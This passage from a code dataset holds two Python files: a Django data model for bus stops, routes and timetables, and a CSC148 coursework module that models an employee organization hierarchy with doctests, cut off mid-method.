{"seq_id":"218281454","text":"import datetime\nfrom django.contrib.gis.db import models\nfrom django.contrib.gis.geos import Point\nfrom django.contrib.postgres.fields import JSONField, DateRangeField\nfrom django.db.models.signals import pre_save\nfrom django.dispatch import receiver\nfrom django.urls import reverse\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.utils.text import slugify\n\n\nclass Stop(models.Model):\n    atco_code = models.CharField(max_length=12, unique=True, primary_key=True, db_index=True)\n    naptan_code = models.CharField(max_length=12)\n    # plate_code = models.CharField(max_length=12, null=True, blank=True)\n    # cleardown_code = models.CharField(max_length=10, null=True, blank=True)\n    common_name = models.CharField(max_length=48)\n    # common_name_lang = models.CharField(max_length=2, null=True, blank=True)\n    # short_common_name = models.CharField(max_length=48, null=True, blank=True)\n    # short_common_name_lang = models.CharField(max_length=2, null=True, blank=True)\n    # landmark = models.CharField(max_length=48, null=True, blank=True)\n    # landmark_lang = models.CharField(max_length=2, null=True, blank=True)\n    # street = models.CharField(max_length=48, null=True, blank=True)\n    # street_lang = models.CharField(max_length=2, null=True, blank=True)\n    # crossing = models.CharField(max_length=48, null=True, blank=True)\n    # crossing_lang = models.CharField(max_length=2, null=True, blank=True)\n    indicator = models.CharField(max_length=48, null=True, blank=True)\n
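    # (added note) the commented-out columns here and below mirror the full\n    # NaPTAN stop schema; they are kept for reference but not persisted\n    # 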
indicator_lang = models.CharField(max_length=2, null=True, blank=True)\n # bearing = models.CharField(max_length=2)\n # nptg_locality_code = models.CharField(max_length=8)\n locality_name = models.CharField(max_length=48)\n # parent_locality_name = models.CharField(max_length=48)\n # grand_parent_locality_name = models.CharField(max_length=48)\n # town = models.CharField(max_length=48, null=True, blank=True)\n # town_lang = models.CharField(max_length=2, null=True, blank=True)\n # suburb = models.CharField(max_length=48, null=True, blank=True)\n # suburb_lang = models.CharField(max_length=2, null=True, blank=True)\n # locality_centre = models.BooleanField()\n # grid_type = models.CharField(max_length=1, null=True, blank=True)\n # easting = models.IntegerField()\n # northing = models.IntegerField()\n longitude = models.FloatField()\n latitude = models.FloatField()\n # stop_type = models.CharField(max_length=3)\n # bus_stop_type = models.CharField(max_length=3, null=True, blank=True)\n # timing_status = models.CharField(max_length=3, null=True, blank=True)\n # default_wait_time = models.IntegerField(null=True, blank=True)\n # notes = models.TextField(null=True, blank=True)\n # notes_lang = models.CharField(max_length=2, null=True, blank=True)\n # administrative_area_code = models.IntegerField()\n # creation_datetime = models.DateTimeField()\n # modification_datetime = models.DateTimeField(null=True, blank=True)\n # revision_number = models.IntegerField(null=True, blank=True)\n # modification = models.CharField(max_length=3, null=True, blank=True)\n # status = models.CharField(max_length=3, null=True, blank=True)\n gis_location = models.PointField(null=True)\n data = JSONField(null=True, blank=True)\n last_modified = models.DateTimeField(auto_now=True)\n\n def get_coordinates(self):\n return [self.latitude, self.longitude]\n\n def get_absolute_url(self):\n return reverse('bus-stop', args=(self.atco_code,))\n\n def get_qualified_name(self):\n return str(self)\n\n @property\n def locality(self):\n return None\n\n @python_2_unicode_compatible\n def __str__(self):\n if self.indicator:\n if self.indicator in ('opp', 'adj', 'at', 'o/s', 'nr', 'before', 'after', 'by', 'on', 'in', 'near'):\n return '%s, %s %s' % (self.locality_name, self.indicator, self.common_name) \\\n if self.locality_name else '%s %s' % (self.indicator, self.common_name)\n else:\n return '%s, %s (%s)' % (self.locality_name, self.common_name, self.indicator) \\\n if self.locality_name else '%s (%s)' % (self.common_name, self.indicator)\n else:\n return '%s, %s' % (self.locality_name, self.common_name) if self.locality_name else '%s' % self.common_name\n\n\n@receiver(pre_save, sender=Stop)\ndef update_gis_fields(sender, instance, **kwargs):\n instance.gis_location = Point(float(instance.longitude), float(instance.latitude))\n\n\nclass Operator(models.Model):\n id = models.CharField(max_length=255, primary_key=True)\n code = models.CharField(max_length=255)\n short_name = models.CharField(max_length=255)\n trading_name = models.CharField(max_length=255)\n last_modified = models.DateTimeField(auto_now=True)\n\n @python_2_unicode_compatible\n def __str__(self):\n return self.trading_name\n\n\nclass Line(models.Model):\n line_id = models.CharField(max_length=255, db_index=True)\n line_name = models.CharField(max_length=255)\n area = models.CharField(max_length=10) # This is the TNDS zone\n filename = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n operator = models.ForeignKey(Operator, 
related_name=\"lines\", on_delete=models.CASCADE)\n standard_origin = models.CharField(max_length=255, blank=True, null=True)\n standard_destination = models.CharField(max_length=255, blank=True, null=True)\n regular_days_of_week = models.CharField(max_length=255, null=True)\n bank_holiday_operation = models.CharField(max_length=255, null=True)\n start_date = models.DateField(null=True)\n end_date = models.DateField(null=True)\n stop_list = JSONField(null=True, blank=True)\n timetable = JSONField(null=True, blank=True)\n slug = models.SlugField(max_length=50)\n last_modified = models.DateTimeField(auto_now=True)\n\n def save(self, *args, **kwargs):\n self.slug = slugify('-'.join([self.line_name, self.description]))[:49]\n super(Line, self).save(*args, **kwargs)\n\n def get_stop_list(self):\n stop_list = {}\n for bound in ['inbound', 'outbound']:\n for dayperiod in ['MondayToFriday', 'Saturday', 'Sunday', 'HolidaysOnly']:\n for stop in self.stop_list[bound][dayperiod]:\n stop_list[stop] = Stop.objects.get(atco_code=stop)\n return stop_list\n\n def get_all_vehicle_journeys(self):\n return VehicleJourney.objects.filter(journey_pattern__route__line=self).order_by('departure_time')\n\n def generate_stop_list(self):\n stop_list = {\n 'inbound': {\n 'MondayToFriday': [],\n 'Saturday': [],\n 'Sunday': [],\n 'HolidaysOnly': []\n },\n 'outbound': {\n 'MondayToFriday': [],\n 'Saturday': [],\n 'Sunday': [],\n 'HolidaysOnly': []\n }\n }\n\n for bound in ['inbound', 'outbound']:\n for dayperiod in ['MondayToFriday', 'Saturday', 'Sunday', 'HolidaysOnly']:\n stop_list[bound][dayperiod] = list(Stop.objects.filter(\n departure_journeys__journey_pattern_section__journey_patterns__route__in=\n Route.objects.filter(line=self, journey_patterns__direction=bound,\n journey_patterns__journeys__days_of_week=dayperiod)).distinct()\\\n .order_by('departure_journeys__stop_from_sequence_number').values_list('atco_code', flat=True))\n last_stop = Stop.objects.filter(\n arrival_journeys__journey_pattern_section__journey_patterns__route__in=\n Route.objects.filter(line=self, journey_patterns__direction=bound,\n journey_patterns__journeys__days_of_week=dayperiod))\\\n .order_by('departure_journeys__stop_to_sequence_number').last()\n if last_stop:\n stop_list[bound][dayperiod].append(last_stop.atco_code)\n self.stop_list = stop_list\n self.save()\n\n def generate_timetable(self):\n # Create list of stops per line number\n self.generate_stop_list()\n\n line_timetable = {\n 'inbound': {\n 'MondayToFriday': {},\n 'Saturday': {},\n 'Sunday': {},\n 'HolidaysOnly': {}\n },\n 'outbound': {\n 'MondayToFriday': {},\n 'Saturday': {},\n 'Sunday': {},\n 'HolidaysOnly': {}\n }\n }\n\n for bound in ['inbound', 'outbound']:\n for dayperiod in ['MondayToFriday', 'Saturday', 'Sunday', 'HolidaysOnly']:\n journeys = VehicleJourney.objects.filter(journey_pattern__route__line=self,\n journey_pattern__direction=bound,\n days_of_week=dayperiod).distinct().order_by('departure_time')\n timetable = line_timetable[bound][dayperiod]\n for stop in self.stop_list[bound][dayperiod]:\n timetable[stop] = []\n i = 0\n for journey in journeys:\n journey.generate_timetable()\n for stop in self.stop_list[bound][dayperiod]:\n timetable[stop].append(None)\n for journey_timetable_entry in journey.timetable:\n try:\n timetable[journey_timetable_entry['stop_id']][i] = journey_timetable_entry['time']\n except:\n print(bound, dayperiod, journey.id, journey.journey_pattern.id, journey.journey_pattern.route.id, journey_timetable_entry)\n i += 1\n\n self.timetable = 
line_timetable\n self.save()\n\n\n @python_2_unicode_compatible\n def __str__(self):\n return \"%s (%s)\" % (self.line_name, self.description)\n\n\nclass Route(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n description = models.TextField()\n line = models.ForeignKey(Line, related_name='routes', on_delete=models.CASCADE)\n stops_list = models.TextField()\n last_modified = models.DateTimeField(auto_now=True)\n\n def get_all_vehicle_journeys(self):\n return VehicleJourney.objects.filter(journey_pattern__route=self).order_by('departure_time')\n\n def get_stops_list(self):\n bus_stops = []\n for stop in self.stops_list.split(','):\n bus_stops.append(Stop.objects.get(atco_code=stop))\n return bus_stops\n\n def get_route_coordinates(self):\n bus_stops = []\n for stop in self.stops_list.split(','):\n bus_stops.append(Stop.objects.get(atco_code=stop).get_coordinates())\n return bus_stops\n\n @python_2_unicode_compatible\n def __str__(self):\n return \"%s - %s\" % (self.line, self.description)\n\n\nclass JourneyPatternSection(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n last_modified = models.DateTimeField(auto_now=True)\n\n @python_2_unicode_compatible\n def __str__(self):\n return \"%s\" % (self.id)\n\n\nclass JourneyPatternTimingLink(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n stop_from = models.ForeignKey(Stop, related_name='departure_journeys', on_delete=models.CASCADE)\n stop_from_timing_status = models.CharField(max_length=3)\n stop_from_sequence_number = models.IntegerField()\n stop_to = models.ForeignKey(Stop, related_name='arrival_journeys', on_delete=models.CASCADE)\n stop_to_timing_status = models.CharField(max_length=3)\n stop_to_sequence_number = models.IntegerField()\n run_time = models.DurationField()\n wait_time = models.DurationField(null=True, blank=True)\n journey_pattern_section = models.ForeignKey(JourneyPatternSection, related_name='timing_links',\n on_delete=models.CASCADE)\n last_modified = models.DateTimeField(auto_now=True)\n\n @python_2_unicode_compatible\n def __str__(self):\n return \"%s - %s (%s)\" % (self.stop_from, self.stop_to, self.run_time)\n\n\nclass JourneyPattern(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n route = models.ForeignKey(Route, related_name='journey_patterns', on_delete=models.CASCADE)\n direction = models.CharField(max_length=100)\n section = models.ForeignKey(JourneyPatternSection, related_name='journey_patterns', on_delete=models.CASCADE)\n last_modified = models.DateTimeField(auto_now=True)\n\n @python_2_unicode_compatible\n def __str__(self):\n return self.id\n\n\n################################################################################################\n# VehicleJourney\n# Directly from TNDS file\n# Deprecated journey_pattern (timinglinks are now TimetableStops)\n################################################################################################\nclass VehicleJourney(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n journey_pattern_ref = models.CharField(max_length=100, null=True, blank=True) # E.g. 
\"JP2\"\n line = models.ForeignKey(Line, related_name='journeys', null=True, blank=True, on_delete=models.CASCADE)\n departure_time = models.TimeField()\n days_of_week = models.CharField(max_length=100, null=True, blank=True)\n nonoperation_bank_holidays = models.CharField(max_length=200, null=True, blank=True)\n operation_bank_holidays = models.CharField(max_length=200, null=True, blank=True)\n direction = models.CharField(max_length=100, null=True, blank=True) # E.g. \"outbound\"|\"inbound\"|blank\n tnds_zone = models.CharField(max_length=20, null=True, blank=True) # E.g. \"EA\"\n order = models.IntegerField()\n last_modified = models.DateTimeField(auto_now=True)\n\n def get_timetable(self):\n return TimetableStop.objects.filter(vehicle_journey=self).order_by('order')\n\n @property\n def timetable(self):\n timetable = []\n for time in TimetableStop.objects.filter(vehicle_journey=self).order_by('order'):\n timetable.append({'stop': time.stop.atco_code, 'time': time.time, 'order': time.order})\n return timetable\n\n def get_timetable_prefetch(self):\n return self.get_timetable().select_related('stop')\n\n def get_stops_list(self):\n return TimetableStop.objects.filter(vehicle_journey=self).order_by('order').values('stop')\n\n @python_2_unicode_compatible\n def __str__(self):\n return self.id\n\nclass SpecialDaysOperation(models.Model):\n vehicle_journey = models.ForeignKey(VehicleJourney, related_name='special_days_operation', on_delete=models.CASCADE)\n days = DateRangeField()\n operates = models.BooleanField()\n\n class Meta:\n indexes = [\n models.Index(fields=['vehicle_journey', 'days', 'operates']),\n ]\n\nclass Timetable(models.Model):\n vehicle_journey = models.ForeignKey(VehicleJourney, related_name='journey_times', on_delete=models.CASCADE)\n stop = models.ForeignKey(Stop, related_name='journey_times', on_delete=models.CASCADE)\n time = models.TimeField()\n order = models.IntegerField() # Order of the stop in the vehicle journey (first stop, order = 1)\n last_stop = models.BooleanField(default=False) # Last stop of a vehicle journey\n\n class Meta:\n indexes = [\n models.Index(fields=['vehicle_journey', 'stop', 'time', 'order', 'last_stop']),\n ]\n\n################################################################################################\n# TimetableStop replaces Timetable, contains stop-time pairs for each VehicleJourney\n# ALL timetable info stored in TimetableStops and VehicleJourney\n# i.e. 
we collect data from JourneyPattern, JourneyPatternSections, JourneyPatternTimingLinks\n################################################################################################\nclass TimetableStop(models.Model):\n vehicle_journey = models.ForeignKey(VehicleJourney, related_name='timetable_stops', on_delete=models.CASCADE)\n stop = models.ForeignKey(Stop, related_name='timetable_stops', on_delete=models.CASCADE)\n time = models.TimeField()\n direction = models.CharField(max_length=100,null=True,blank=True)\n run_time = models.DurationField()\n wait_time = models.DurationField(null=True, blank=True)\n order = models.IntegerField() # Order of the stop in the vehicle journey (first stop, order = 1)\n last_stop = models.BooleanField(default=False) # Last stop of a vehicle journey\n\n class Meta:\n indexes = [\n models.Index(fields=['vehicle_journey', 'stop', 'time', 'order', 'last_stop']),\n ]\n","sub_path":"tfc_web/transport/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"553480370","text":"\"\"\"Assignment 2: Organization Hierarchy\nYou must NOT use list.sort() or sorted() in your code.\n\n=== CSC148 Fall 2019 ===\nDepartment of Computer Science,\nUniversity of Toronto\n\n=== Module description ===\nThis module contains all of the classes necessary to model the entities\nin an organization's hierarchy.\n\nThis code is provided solely for the personal and private use of\nstudents taking the CSC148 course at the University of Toronto.\nCopying for purposes other than this use is expressly prohibited.\nAll forms of distribution of this code, whether as given or with\nany changes, are expressly prohibited.\n\nAuthor: Sophia Huynh\n\nAll of the files in this directory and all subdirectories are:\nCopyright (c) 2019 Sophia Huynh\n\"\"\"\nfrom __future__ import annotations\nfrom typing import List, Optional, Union, TextIO, Set\n\n\ndef merge(lst1: list, lst2: list) -> list:\n \"\"\"Return a sorted list with the elements in and .\n\n Pre-condition: and are both sorted.\n\n >>> merge([1, 2, 5], [3, 4, 6])\n [1, 2, 3, 4, 5, 6]\n \"\"\"\n result = []\n i, j = 0, 0\n while i < len(lst1) and j < len(lst2):\n if lst1[i] < lst2[j]:\n result.append(lst1[i])\n i += 1\n else:\n result.append(lst2[j])\n j += 1\n return result + lst1[i:] + lst2[j:]\n\n\nclass Employee:\n \"\"\"An Employee: an employee in an organization.\n\n === Public Attributes ===\n eid:\n The ID number of the employee. Within an organization, each employee ID\n number is unique.\n name:\n The name of the Employee.\n position:\n The name of the Employee's position within the organization.\n salary:\n The salary of the Employee.\n rating:\n The rating of the Employee.\n\n === Private Attributes ===\n _superior:\n The superior of the Employee in the organization.\n _subordinates:\n A list of the Employee's direct subordinates (Employees that work under\n this Employee).\n\n === Representation Invariants ===\n - eid > 0\n - Within an organization, each eid only appears once. 
Two Employees cannot\n share the same eid.\n - salary > 0\n - 0 <= rating <= 100\n - Subordinates in _subordinates are in increasing order of eid.\n \"\"\"\n eid: int\n name: str\n position: str\n salary: float\n rating: int\n _superior: Optional[Employee]\n _subordinates: List[Employee]\n\n def __init__(self, eid: int, name: str, position: str,\n salary: float, rating: int) -> None:\n \"\"\"Initialize this Employee with the ID , name ,\n position , salary and rating .\n\n >>> e = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e.eid\n 1\n >>> e.rating\n 50\n \"\"\"\n self.eid = eid\n self.name = name\n self.position = position\n self.salary = salary\n self.rating = rating\n self._superior = None\n self._subordinates = []\n\n def __lt__(self, other: Employee) -> bool:\n \"\"\"Return True iff is an Employee and this Employee's eid is\n less than 's eid.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1 < e2\n True\n \"\"\"\n return self.eid < other.eid\n\n def get_direct_subordinates(self) -> List[Employee]:\n \"\"\"Return a list of the direct subordinates of this Employee in order of\n ascending IDs.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1.become_subordinate(e2)\n >>> e2.get_direct_subordinates()[0].name\n 'Emma Ployee'\n \"\"\"\n return self._subordinates\n\n def get_all_subordinates(self) -> List[Employee]:\n \"\"\"Return a list of all of the subordinates of this Employee in order of\n ascending IDs.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3.get_all_subordinates()[0].name\n 'Emma Ployee'\n >>> e3.get_all_subordinates()[1].name\n 'Sue Perior'\n \"\"\"\n result = self.get_direct_subordinates()\n for s in self.get_direct_subordinates():\n result = merge(result, s.get_all_subordinates())\n return result\n\n def get_organization_head(self) -> Employee:\n \"\"\"Return the head of the organization.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e1.get_organization_head().name\n 'Bigg Boss'\n \"\"\"\n if self.get_superior() is None:\n return self\n return self.get_superior().get_organization_head()\n\n def get_superior(self) -> Optional[Employee]:\n \"\"\"Returns the superior of this Employee or None if no superior exists.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_superior() is None\n True\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1.become_subordinate(e2)\n >>> e1.get_superior().name\n 'Sue Perior'\n \"\"\"\n return self._superior\n\n def become_subordinate(self, superior: Union[Employee, None]) -> None:\n \"\"\"Set this Employee's superior to and becomes a direct\n subordinate of .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1.become_subordinate(e2)\n >>> e1.get_superior().eid\n 2\n >>> e2.get_direct_subordinates()[0].eid\n 1\n >>> e1.become_subordinate(None)\n >>> e1.get_superior() is None\n True\n >>> e2.get_direct_subordinates()\n 
[]\n \"\"\"\n if superior is not None:\n superior.add_subordinate(self)\n else:\n if self.get_superior() is not None:\n self.get_superior().remove_subordinate_id(self.eid)\n self._superior = superior\n\n def remove_subordinate_id(self, eid: int) -> None:\n \"\"\"Remove the subordinate with the eid from this Employee's list\n of direct subordinates.\n\n Does NOT change the employee with eid 's superior.\n\n Pre-condition: This Employee has a subordinate with eid .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1.become_subordinate(e2)\n >>> e2.get_direct_subordinates()[0].eid\n 1\n >>> e2.remove_subordinate_id(1)\n >>> e2.get_direct_subordinates()\n []\n >>> e1.get_superior() is e2\n True\n \"\"\"\n self._subordinates = [s for s in self._subordinates if s.eid != eid]\n # for i in range(len(self._subordinates)):\n # if self._subordinates[i].eid == eid:\n # self._subordinates.pop(i)\n # break\n\n def add_subordinate(self, subordinate: Employee) -> None:\n \"\"\"Add to this Employee's list of direct subordinates.\n\n Does NOT change subordinate's superior.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e2.add_subordinate(e1)\n >>> e2.get_direct_subordinates()[0].eid\n 1\n >>> e1.get_superior() is None\n True\n \"\"\"\n if subordinate not in self.get_direct_subordinates():\n self._subordinates = \\\n merge(self.get_direct_subordinates(), [subordinate])\n\n def get_employee(self, eid: int) -> Optional[Employee]:\n \"\"\"Returns the employee with ID or None if no such employee exists\n as a subordinate of this employee.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3.get_employee(1) is e1\n True\n >>> e1.get_employee(1) is e1\n True\n >>> e2.get_employee(3) is None\n True\n \"\"\"\n if self.eid == eid:\n return self\n for s in self.get_all_subordinates():\n if s.eid == eid:\n return s\n return None\n\n def get_employees_paid_more_than(self, amount: float) -> List[Employee]:\n \"\"\"Get all subordinates of this employee that have a salary higher than\n (including this employee, if this employee's salary is higher\n than ).\n\n Employees must be returned in increasing order of eid.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> more_than_10000 = e3.get_employees_paid_more_than(10000)\n >>> len(more_than_10000) == 2\n True\n >>> more_than_10000[0].name\n 'Sue Perior'\n >>> more_than_10000[1].name\n 'Bigg Boss'\n \"\"\"\n result = [s for s in self.get_all_subordinates() if s.salary > amount]\n if self.salary > amount:\n result = merge([self], result)\n return result\n\n def get_higher_paid_employees(self) -> List[Employee]:\n \"\"\"Return a list of all employees in the organization (the organization\n head and their subordinates) that are paid more than this employee\n\n Employees must be returned with IDs in increasing order.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> 
e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> [e.name for e in e1.get_higher_paid_employees()]\n ['Sue Perior', 'Bigg Boss']\n >>> [e.name for e in e2.get_higher_paid_employees()]\n ['Bigg Boss']\n >>> e3.get_higher_paid_employees()\n []\n \"\"\"\n return self.get_organization_head().get_employees_paid_more_than(\n self.salary)\n\n def get_closest_common_superior(self, eid: int) -> Employee:\n \"\"\"Return the closest common superior in the organization (the\n organization head and their subordinates) between the employee and the\n employee with ID .\n\n Precondition: exists in the organization.\n\n >>> e1 = Employee(1, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 50)\n >>> e3 = Employee(3, \"John Doe\", \"Worker\", 10000, 30)\n >>> e4 = Employee(4, \"Mane Gerr\", \"Manager\", 20000, 50)\n >>> e5 = Employee(5, \"Jane Doe\", \"Worker\", 10000, 30)\n >>> e2.become_subordinate(e1)\n >>> e3.become_subordinate(e2)\n >>> e4.become_subordinate(e1)\n >>> e5.become_subordinate(e2)\n >>> e3.get_closest_common_superior(5).name\n 'Sue Perior'\n >>> e3.get_closest_common_superior(4).name\n 'Bigg Boss'\n >>> e3.get_closest_common_superior(2).name\n 'Sue Perior'\n \"\"\"\n if self.get_employee(eid) is None:\n return self.get_superior().get_closest_common_superior(eid)\n return self\n\n def get_department_name(self) -> str:\n \"\"\"Returns the name of the department this Employee is in. If the\n Employee is not part of a department, return an empty string.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_department_name()\n ''\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e1.become_subordinate(e2)\n >>> e1.get_department_name()\n 'Department'\n \"\"\"\n if isinstance(self, Leader):\n return self.get_department_name()\n if self.get_superior() is None:\n return \"\"\n return self.get_superior().get_department_name()\n\n def get_position_in_hierarchy(self) -> str:\n \"\"\"Return the full position of the Employee.\n The full position takes the form:\n \n\n Followed by a comma separating any departments they're a part of (from\n their immediate department, to the department that one belongs to, and\n so on.)\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_position_in_hierarchy()\n 'Worker'\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e1.get_position_in_hierarchy()\n 'Worker, Department, Company'\n >>> e2.get_position_in_hierarchy()\n 'Manager, Department, Company'\n >>> e3.get_position_in_hierarchy()\n 'CEO, Company'\n \"\"\"\n return ', '.join([self.position] + self._get_all_department_names([]))\n\n def get_department_name2(self) -> Optional[str]:\n \"\"\"Returns the name of the department this Employee is in. 
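get_closest_common_superior performs a full subtree search (get_employee) at every step of the climb, which costs O(n) per level. An equivalent O(depth) formulation collects one ancestor chain and walks the other node up until the chains meet; a sketch under the same precondition (eid exists in the organization):

def get_closest_common_superior(self, eid):
    # Collect this Employee's ancestor chain (including itself), then
    # climb from the other employee until we hit a node on that chain.
    # The first hit is the closest common superior.
    other = self.get_organization_head().get_employee(eid)
    ancestor_ids = set()
    node = self
    while node is not None:
        ancestor_ids.add(node.eid)
        node = node.get_superior()
    node = other
    while node.eid not in ancestor_ids:
        node = node.get_superior()
    return node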
If the\n Employee is not part of a department, return None.\n\n Note: This method is almost the same as get_department_name, except it\n returns None instead of a blank string if the Employee is not in a\n department.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_department_name2() is None\n True\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e1.become_subordinate(e2)\n >>> e1.get_department_name2()\n 'Department'\n \"\"\"\n if isinstance(self, Leader):\n return self.get_department_name() # Leader.get_department_name\n if self.get_superior() is None:\n return None\n return self.get_superior().get_department_name2()\n\n def _get_all_department_names(self, curr: List[str]) -> List[str]:\n \"\"\"Helper method that creates a list of all the departments an\n Employee is in.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e1._get_all_department_names([])\n ['Department', 'Company']\n \"\"\"\n if self.get_department_name2() is not None and \\\n self.get_department_name2() not in curr:\n curr.append(self.get_department_name2())\n if self.get_superior() is not None:\n return self.get_superior()._get_all_department_names(curr)\n return curr\n\n def get_department_leader(self) -> Optional[Employee]:\n \"\"\"Return the leader of this Employee's department. If this Employee is\n not in a department, return None.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_department_leader() is None\n True\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e1.get_department_leader().name\n 'Sue Perior'\n >>> e2.get_department_leader().name\n 'Sue Perior'\n \"\"\"\n if self.get_superior() is None:\n if self.get_department_name2() is None:\n return None\n return self\n if self.get_department_name2() != \\\n self.get_superior().get_department_name2():\n return self\n return self.get_superior().get_department_leader()\n\n def create_leader(self, department_name: str) -> Leader:\n \"\"\"Create and return a Leader of with the same\n attributes as Employee.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> l1 = e1.create_leader(\"Company\")\n >>> isinstance(l1, Leader)\n True\n >>> l1.name\n 'Emma Ployee'\n >>> l1.get_department_name()\n 'Company'\n \"\"\"\n return Leader(self.eid, self.name, self.position, self.salary,\n self.rating, department_name)\n\n def _remove_subordinate_deep(self, employee: Employee) -> None:\n \"\"\"Remove from the list of subordinates of this Employee, or\n remove from the list of subordinates of all the subordinates\n of this Employee.\n\n Precondition: in self.get_all_subordinates()\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3._remove_subordinate_deep(e1)\n >>> [e.name for e in e3.get_all_subordinates()]\n ['Sue Perior']\n \"\"\"\n if employee in self.get_direct_subordinates():\n self.remove_subordinate_id(employee.eid)\n else:\n for s in 
self.get_direct_subordinates():\n s._remove_subordinate_deep(employee)\n\n def change_department_leader(self) -> Employee:\n \"\"\"Makes this Employee the leader of their current department,\n becoming the superior of the current department leader.\n The Employee keeps all of their subordinates, in addition\n to gaining the leader as a subordinate. Return this new leader.\n\n If this Employee is already a leader or does not belong to a\n department, do nothing and return this Employee.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> l2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> l3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(l2)\n >>> l2.become_subordinate(l3)\n >>> l1 = e1.change_department_leader()\n >>> len(l3.get_direct_subordinates())\n 1\n >>> l3.get_direct_subordinates()[0].name\n 'Emma Ployee'\n >>> len(l1.get_direct_subordinates())\n 1\n >>> l1.get_direct_subordinates()[0].name\n 'Sue Perior'\n >>> l1.get_direct_subordinates()[0].get_department_leader().name\n 'Emma Ployee'\n >>> l1.get_superior().name\n 'Bigg Boss'\n \"\"\"\n if isinstance(self, Leader) or self.get_department_name2() is None:\n return self\n old_leader = 